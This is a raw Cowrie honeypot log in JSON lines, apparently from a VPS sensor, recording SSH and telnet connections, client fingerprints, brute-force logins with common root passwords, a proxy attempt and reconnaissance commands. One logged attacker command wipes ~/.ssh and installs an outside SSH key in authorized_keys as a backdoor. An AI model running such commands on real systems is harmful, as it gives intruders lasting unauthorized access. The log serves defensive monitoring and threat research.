sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T19:39:43.826266Z","src_ip":"213.209.150.239","session":"86da8c931290"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:39:44.109362Z","src_ip":"213.209.150.239","session":"86da8c931290"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":3470,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:3470","sensor":"my-vps","timestamp":"2025-08-26T19:39:44.166852Z","session":"86da8c931290"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T19:39:44.223782Z","src_ip":"213.209.150.239","session":"86da8c931290"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":17039,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:17039","sensor":"my-vps","timestamp":"2025-08-26T19:39:44.379234Z","session":"86da8c931290"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T19:39:44.436143Z","src_ip":"213.209.150.239","session":"86da8c931290"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:39:44.494467Z","src_ip":"213.209.150.239","session":"86da8c931290"}
{"eventid":"cowrie.session.closed","duration":12.837724685668945,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:39:46.975333Z","src_ip":"113.229.80.250","session":"a5c8244bc8ba"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":58682,"dst_ip":"1.2.3.4","dst_port":23,"session":"74c79e810c17","protocol":"telnet","message":"New connection: 113.229.80.250:58682 (1.2.3.4:23) [session: 74c79e810c17]","sensor":"my-vps","timestamp":"2025-08-26T19:39:47.149233Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":45668,"dst_ip":"1.2.3.4","dst_port":22,"session":"17da7d5c355f","protocol":"ssh","message":"New connection: 217.154.1.158:45668 (1.2.3.4:22) [session: 17da7d5c355f]","sensor":"my-vps","timestamp":"2025-08-26T19:39:50.855261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:39:50.856364Z","src_ip":"217.154.1.158","session":"17da7d5c355f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:39:50.873288Z","src_ip":"217.154.1.158","session":"17da7d5c355f"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger123","message":"login attempt [ranger/ranger123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:39:50.918367Z","src_ip":"217.154.1.158","session":"17da7d5c355f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:39:51.935183Z","src_ip":"217.154.1.158","session":"17da7d5c355f"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":60306,"dst_ip":"1.2.3.4","dst_port":22,"session":"390ff7cb1bc5","protocol":"ssh","message":"New connection: 45.88.8.186:60306 (1.2.3.4:22) [session: 390ff7cb1bc5]","sensor":"my-vps","timestamp":"2025-08-26T19:39:55.642094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:39:56.277082Z","src_ip":"45.88.8.186","session":"390ff7cb1bc5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:39:56.277742Z","src_ip":"45.88.8.186","session":"390ff7cb1bc5"}
{"eventid":"cowrie.session.closed","duration":30.797638416290283,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:39:59.091425Z","src_ip":"212.227.125.160","session":"cff8964272eb"}
{"eventid":"cowrie.login.success","username":"root","password":"alireza1381","message":"login attempt [root/alireza1381] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:39:59.218341Z","src_ip":"45.88.8.186","session":"390ff7cb1bc5"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:39:59.963367Z","src_ip":"45.88.8.186","session":"390ff7cb1bc5"}
{"eventid":"cowrie.session.closed","duration":13.192054033279419,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:40:00.341218Z","src_ip":"113.229.80.250","session":"74c79e810c17"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":58901,"dst_ip":"1.2.3.4","dst_port":23,"session":"c613463d5a26","protocol":"telnet","message":"New connection: 113.229.80.250:58901 (1.2.3.4:23) [session: c613463d5a26]","sensor":"my-vps","timestamp":"2025-08-26T19:40:00.546158Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":54592,"dst_ip":"1.2.3.4","dst_port":22,"session":"f69953c0c522","protocol":"ssh","message":"New connection: 217.154.1.158:54592 (1.2.3.4:22) [session: f69953c0c522]","sensor":"my-vps","timestamp":"2025-08-26T19:40:08.425850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:40:08.426772Z","src_ip":"217.154.1.158","session":"f69953c0c522"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:40:08.441144Z","src_ip":"217.154.1.158","session":"f69953c0c522"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2W3E4R","message":"login attempt [root/1Q2W3E4R] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:40:08.500875Z","src_ip":"217.154.1.158","session":"f69953c0c522"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:40:08.553454Z","src_ip":"217.154.1.158","session":"f69953c0c522"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:40:08.554248Z","src_ip":"217.154.1.158","session":"f69953c0c522"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:40:08.571132Z","src_ip":"217.154.1.158","session":"f69953c0c522"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:40:08.572198Z","src_ip":"217.154.1.158","session":"f69953c0c522"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":43486,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f3043a5a1b8","protocol":"ssh","message":"New connection: 199.195.248.191:43486 (1.2.3.4:22) [session: 8f3043a5a1b8]","sensor":"my-vps","timestamp":"2025-08-26T19:40:10.059910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:40:10.068389Z","src_ip":"199.195.248.191","session":"8f3043a5a1b8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:40:10.182128Z","src_ip":"199.195.248.191","session":"8f3043a5a1b8"}
{"eventid":"cowrie.login.success","username":"root","password":"123456tT","message":"login attempt [root/123456tT] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:40:10.663441Z","src_ip":"199.195.248.191","session":"8f3043a5a1b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:40:10.983356Z","src_ip":"199.195.248.191","session":"8f3043a5a1b8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:40:10.984125Z","src_ip":"199.195.248.191","session":"8f3043a5a1b8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:40:10.985187Z","src_ip":"199.195.248.191","session":"8f3043a5a1b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:40:11.099911Z","src_ip":"199.195.248.191","session":"8f3043a5a1b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:40:11.350504Z","src_ip":"199.195.248.191","session":"8f3043a5a1b8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:40:11.351326Z","src_ip":"199.195.248.191","session":"8f3043a5a1b8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:40:11.461885Z","src_ip":"199.195.248.191","session":"8f3043a5a1b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:40:11.463033Z","src_ip":"199.195.248.191","session":"8f3043a5a1b8"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":44184,"dst_ip":"1.2.3.4","dst_port":22,"session":"1538a89bb1a5","protocol":"ssh","message":"New connection: 199.195.248.191:44184 (1.2.3.4:22) [session: 1538a89bb1a5]","sensor":"my-vps","timestamp":"2025-08-26T19:40:11.563169Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:40:11.567877Z","src_ip":"199.195.248.191","session":"1538a89bb1a5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:40:11.675356Z","src_ip":"199.195.248.191","session":"1538a89bb1a5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:40:12.107686Z","src_ip":"199.195.248.191","session":"1538a89bb1a5"}
{"eventid":"cowrie.session.closed","duration":12.621585845947266,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:40:13.167666Z","src_ip":"113.229.80.250","session":"c613463d5a26"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:40:13.226023Z","src_ip":"199.195.248.191","session":"1538a89bb1a5"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":44998,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee29acb47d57","protocol":"ssh","message":"New connection: 199.195.248.191:44998 (1.2.3.4:22) [session: ee29acb47d57]","sensor":"my-vps","timestamp":"2025-08-26T19:40:13.343625Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:40:13.352084Z","src_ip":"199.195.248.191","session":"ee29acb47d57"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":59146,"dst_ip":"1.2.3.4","dst_port":23,"session":"99305649aea6","protocol":"telnet","message":"New connection: 113.229.80.250:59146 (1.2.3.4:23) [session: 99305649aea6]","sensor":"my-vps","timestamp":"2025-08-26T19:40:13.379588Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:40:13.466755Z","src_ip":"199.195.248.191","session":"ee29acb47d57"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:40:13.956982Z","src_ip":"199.195.248.191","session":"ee29acb47d57"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:40:14.078842Z","src_ip":"199.195.248.191","session":"8f3043a5a1b8"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:40:14.079698Z","src_ip":"199.195.248.191","session":"ee29acb47d57"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":45306,"dst_ip":"1.2.3.4","dst_port":22,"session":"c303d3d440c3","protocol":"ssh","message":"New connection: 217.154.1.158:45306 (1.2.3.4:22) [session: c303d3d440c3]","sensor":"my-vps","timestamp":"2025-08-26T19:40:25.971706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:40:25.972682Z","src_ip":"217.154.1.158","session":"c303d3d440c3"}
